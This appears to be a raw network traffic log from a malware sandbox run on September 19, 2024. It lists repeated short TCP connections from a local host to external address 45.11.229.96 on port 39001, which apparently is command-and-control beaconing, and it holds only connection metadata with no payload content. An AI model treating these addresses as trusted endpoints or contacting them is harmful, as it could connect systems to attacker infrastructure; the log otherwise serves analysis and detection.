Sep 19, 2024 02:27:07.443111897 CEST	39001	49849	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:07.443245888 CEST	49849	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:07.443325043 CEST	49849	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:07.448149920 CEST	39001	49849	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:07.548707962 CEST	49850	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:07.553838968 CEST	39001	49850	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:07.553962946 CEST	49850	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:07.656443119 CEST	49850	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:07.661607027 CEST	39001	49850	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:07.662194967 CEST	49850	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:07.666970015 CEST	39001	49850	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:08.179028034 CEST	39001	49850	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:08.179085970 CEST	49850	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:08.179267883 CEST	49850	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:08.184322119 CEST	39001	49850	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:08.298655033 CEST	49851	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:08.303761959 CEST	39001	49851	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:08.303831100 CEST	49851	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:08.316696882 CEST	49851	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:08.321618080 CEST	39001	49851	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:08.321681023 CEST	49851	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:08.326492071 CEST	39001	49851	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:08.947310925 CEST	39001	49851	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:08.948441982 CEST	49851	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:08.948441982 CEST	49851	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:08.953344107 CEST	39001	49851	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:09.064218998 CEST	49852	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:09.069155931 CEST	39001	49852	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:09.073542118 CEST	49852	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:09.600826025 CEST	49852	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:09.605982065 CEST	39001	49852	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:09.608488083 CEST	49852	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:09.613250971 CEST	39001	49852	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:10.060956001 CEST	39001	49852	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:10.061135054 CEST	49852	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:10.066359043 CEST	49852	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:10.071166039 CEST	39001	49852	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:10.237958908 CEST	49853	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:10.242999077 CEST	39001	49853	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:10.243139029 CEST	49853	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:10.268657923 CEST	49853	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:10.274741888 CEST	39001	49853	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:10.274811029 CEST	49853	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:10.279633045 CEST	39001	49853	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:10.871795893 CEST	39001	49853	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:10.871874094 CEST	49853	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:10.871989965 CEST	49853	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:10.877099037 CEST	39001	49853	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:10.987852097 CEST	49854	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:10.992784023 CEST	39001	49854	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:10.992870092 CEST	49854	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:11.023874044 CEST	49854	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:11.028928995 CEST	39001	49854	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:11.029011965 CEST	49854	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:11.033843994 CEST	39001	49854	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:11.627077103 CEST	39001	49854	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:11.627180099 CEST	49854	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:11.627338886 CEST	49854	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:11.633584976 CEST	39001	49854	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:11.735842943 CEST	49855	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:11.740786076 CEST	39001	49855	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:11.740906000 CEST	49855	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:11.757359982 CEST	49855	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:11.762244940 CEST	39001	49855	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:11.762475014 CEST	49855	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:11.767297029 CEST	39001	49855	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:12.501205921 CEST	39001	49855	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:12.501302004 CEST	49855	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:12.502135992 CEST	49855	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:12.507055044 CEST	39001	49855	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:12.610760927 CEST	49856	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:12.615753889 CEST	39001	49856	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:12.615833998 CEST	49856	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:12.646786928 CEST	49856	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:12.651606083 CEST	39001	49856	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:12.651662111 CEST	49856	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:12.656433105 CEST	39001	49856	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:13.314559937 CEST	39001	49856	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:13.314656973 CEST	49856	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:13.314851999 CEST	49856	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:13.319653988 CEST	39001	49856	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:13.424521923 CEST	49857	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:13.429924011 CEST	39001	49857	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:13.430578947 CEST	49857	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:13.444082022 CEST	49857	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:13.449161053 CEST	39001	49857	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:13.449271917 CEST	49857	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:13.454090118 CEST	39001	49857	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:14.126132965 CEST	39001	49857	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:14.126204967 CEST	49857	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:14.126386881 CEST	49857	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:14.131134033 CEST	39001	49857	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:14.236737967 CEST	49858	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:14.241750002 CEST	39001	49858	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:14.241821051 CEST	49858	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:14.262641907 CEST	49858	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:14.267555952 CEST	39001	49858	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:14.267608881 CEST	49858	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:14.272391081 CEST	39001	49858	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:14.921637058 CEST	39001	49858	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:14.921715975 CEST	49858	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:14.922008991 CEST	49858	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:14.926788092 CEST	39001	49858	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:15.037333012 CEST	49859	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:15.042363882 CEST	39001	49859	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:15.042491913 CEST	49859	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:15.168775082 CEST	49859	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:15.174062967 CEST	39001	49859	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:15.174144983 CEST	49859	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:15.178936005 CEST	39001	49859	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:15.736665964 CEST	39001	49859	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:15.736782074 CEST	49859	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:15.736932039 CEST	49859	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:15.741710901 CEST	39001	49859	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:15.913901091 CEST	49860	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:15.919406891 CEST	39001	49860	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:15.919508934 CEST	49860	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:15.971203089 CEST	49860	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:15.976018906 CEST	39001	49860	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:15.976126909 CEST	49860	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:15.981013060 CEST	39001	49860	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:16.573231936 CEST	39001	49860	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:16.573313951 CEST	49860	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:16.573453903 CEST	49860	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:16.578183889 CEST	39001	49860	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:16.690531969 CEST	49861	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:16.695657969 CEST	39001	49861	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:16.695744991 CEST	49861	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:16.712856054 CEST	49861	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:16.717981100 CEST	39001	49861	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:16.718079090 CEST	49861	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:16.723184109 CEST	39001	49861	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:17.338121891 CEST	39001	49861	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:17.338231087 CEST	49861	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:17.338404894 CEST	49861	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:17.343350887 CEST	39001	49861	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:17.457659960 CEST	49862	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:17.462621927 CEST	39001	49862	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:17.464622021 CEST	49862	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:17.581056118 CEST	49862	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:17.586927891 CEST	39001	49862	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:17.587456942 CEST	49862	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:17.592890978 CEST	39001	49862	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:18.118578911 CEST	39001	49862	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:18.118642092 CEST	49862	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:18.118762016 CEST	49862	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:18.125014067 CEST	39001	49862	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:18.247136116 CEST	49863	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:18.252094030 CEST	39001	49863	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:18.252183914 CEST	49863	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:18.269113064 CEST	49863	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:18.273962975 CEST	39001	49863	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:18.274028063 CEST	49863	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:18.278918982 CEST	39001	49863	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:18.402757883 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:27:18.641177893 CEST	49730	80	192.168.2.6	95.179.241.203
Sep 19, 2024 02:27:18.672807932 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:18.677669048 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:18.677733898 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:18.682457924 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:18.878768921 CEST	39001	49863	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:18.878911018 CEST	49863	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:18.879018068 CEST	49863	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:18.883871078 CEST	39001	49863	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:18.989101887 CEST	49864	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:18.994663000 CEST	39001	49864	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:18.995404005 CEST	49864	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:19.006696939 CEST	49864	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:19.013696909 CEST	39001	49864	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:19.014317989 CEST	49864	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:19.019742012 CEST	39001	49864	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:19.060448885 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:19.110209942 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:19.194225073 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:19.197740078 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:19.203593969 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:19.203737020 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:19.209284067 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:19.664113998 CEST	39001	49864	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:19.664246082 CEST	49864	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:19.664429903 CEST	49864	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:19.669173956 CEST	39001	49864	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:19.792432070 CEST	49865	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:19.902492046 CEST	39001	49865	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:19.906332970 CEST	49865	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:19.920859098 CEST	49865	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:19.925645113 CEST	39001	49865	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:19.925842047 CEST	49865	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:19.930660009 CEST	39001	49865	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:20.548013926 CEST	39001	49865	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:20.548135042 CEST	49865	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:20.548552036 CEST	49865	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:20.553313971 CEST	39001	49865	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:20.657915115 CEST	49866	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:20.662955046 CEST	39001	49866	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:20.663063049 CEST	49866	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:20.675942898 CEST	49866	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:20.680732965 CEST	39001	49866	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:20.680811882 CEST	49866	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:20.685589075 CEST	39001	49866	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:21.289361954 CEST	39001	49866	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:21.291404963 CEST	49866	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:21.293148994 CEST	49866	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:21.297951937 CEST	39001	49866	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:21.407609940 CEST	49867	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:21.412637949 CEST	39001	49867	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:21.412740946 CEST	49867	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:21.428955078 CEST	49867	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:21.433862925 CEST	39001	49867	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:21.434134007 CEST	49867	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:21.438951015 CEST	39001	49867	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:22.041269064 CEST	39001	49867	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:22.041364908 CEST	49867	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:22.041559935 CEST	49867	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:22.046802044 CEST	39001	49867	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:22.160835981 CEST	49868	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:22.165712118 CEST	39001	49868	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:22.165777922 CEST	49868	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:22.194586992 CEST	49868	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:22.199428082 CEST	39001	49868	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:22.199485064 CEST	49868	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:22.204246044 CEST	39001	49868	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:22.842354059 CEST	39001	49868	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:22.842406034 CEST	49868	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:22.842569113 CEST	49868	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:22.847304106 CEST	39001	49868	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:22.971664906 CEST	49869	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:22.976699114 CEST	39001	49869	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:22.980775118 CEST	49869	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:22.996735096 CEST	49869	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:23.001559973 CEST	39001	49869	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:23.008429050 CEST	49869	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:23.013240099 CEST	39001	49869	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:24.551525116 CEST	39001	49869	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:24.551662922 CEST	39001	49869	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:24.551723957 CEST	49869	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:24.551724911 CEST	49869	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:24.551762104 CEST	39001	49869	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:24.551832914 CEST	49869	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:24.551834106 CEST	49869	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:24.552094936 CEST	39001	49869	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:24.552150011 CEST	49869	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:24.749051094 CEST	39001	49869	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:24.781126022 CEST	49870	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:24.786262035 CEST	39001	49870	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:24.786345005 CEST	49870	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:24.803338051 CEST	49870	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:24.808214903 CEST	39001	49870	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:24.808258057 CEST	49870	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:24.813024998 CEST	39001	49870	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:25.224935055 CEST	49870	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:25.229922056 CEST	39001	49870	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:25.230065107 CEST	49870	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:25.234931946 CEST	39001	49870	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:25.450737953 CEST	39001	49870	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:25.450840950 CEST	49870	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:25.452775002 CEST	49870	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:25.457787991 CEST	39001	49870	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:25.563936949 CEST	49871	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:25.568830967 CEST	39001	49871	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:25.569073915 CEST	49871	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:25.765060902 CEST	49871	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:25.770015001 CEST	39001	49871	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:25.770291090 CEST	49871	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:25.775166988 CEST	39001	49871	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:26.227214098 CEST	39001	49871	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:26.227273941 CEST	49871	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:26.227505922 CEST	49871	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:26.232254028 CEST	39001	49871	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:26.369682074 CEST	49873	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:26.474886894 CEST	39001	49873	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:26.474977970 CEST	49873	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:26.586168051 CEST	49873	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:26.591068983 CEST	39001	49873	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:26.591152906 CEST	49873	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:26.595942020 CEST	39001	49873	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:27.141896009 CEST	39001	49873	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:27.141998053 CEST	49873	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:27.146908998 CEST	49873	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:27.151858091 CEST	39001	49873	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:27.251717091 CEST	49874	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:27.256587982 CEST	39001	49874	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:27.257442951 CEST	49874	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:27.273684978 CEST	49874	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:27.278479099 CEST	39001	49874	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:27.279194117 CEST	49874	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:27.283996105 CEST	39001	49874	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:27.890197992 CEST	39001	49874	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:27.892395973 CEST	49874	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:27.892713070 CEST	49874	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:27.897519112 CEST	39001	49874	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:28.001534939 CEST	49875	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:28.006454945 CEST	39001	49875	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:28.006529093 CEST	49875	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:28.029675007 CEST	49875	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:28.034785032 CEST	39001	49875	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:28.034833908 CEST	49875	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:28.039669037 CEST	39001	49875	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:28.657267094 CEST	39001	49875	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:28.657329082 CEST	49875	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:28.657473087 CEST	49875	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:28.662190914 CEST	39001	49875	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:28.766942978 CEST	49876	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:28.771879911 CEST	39001	49876	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:28.771946907 CEST	49876	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:28.818594933 CEST	49876	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:28.823342085 CEST	39001	49876	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:28.823406935 CEST	49876	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:28.828166008 CEST	39001	49876	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:29.402204037 CEST	39001	49876	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:29.402342081 CEST	49876	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:29.402472019 CEST	49876	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:29.407193899 CEST	39001	49876	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:29.517049074 CEST	49877	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:29.521925926 CEST	39001	49877	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:29.522049904 CEST	49877	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:29.538209915 CEST	49877	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:29.543148041 CEST	39001	49877	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:29.543298960 CEST	49877	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:29.548103094 CEST	39001	49877	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:30.184509993 CEST	39001	49877	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:30.184736013 CEST	49877	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:30.184858084 CEST	49877	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:30.189630985 CEST	39001	49877	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:30.298247099 CEST	49878	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:30.303086996 CEST	39001	49878	45.11.229.96	192.168.2.6
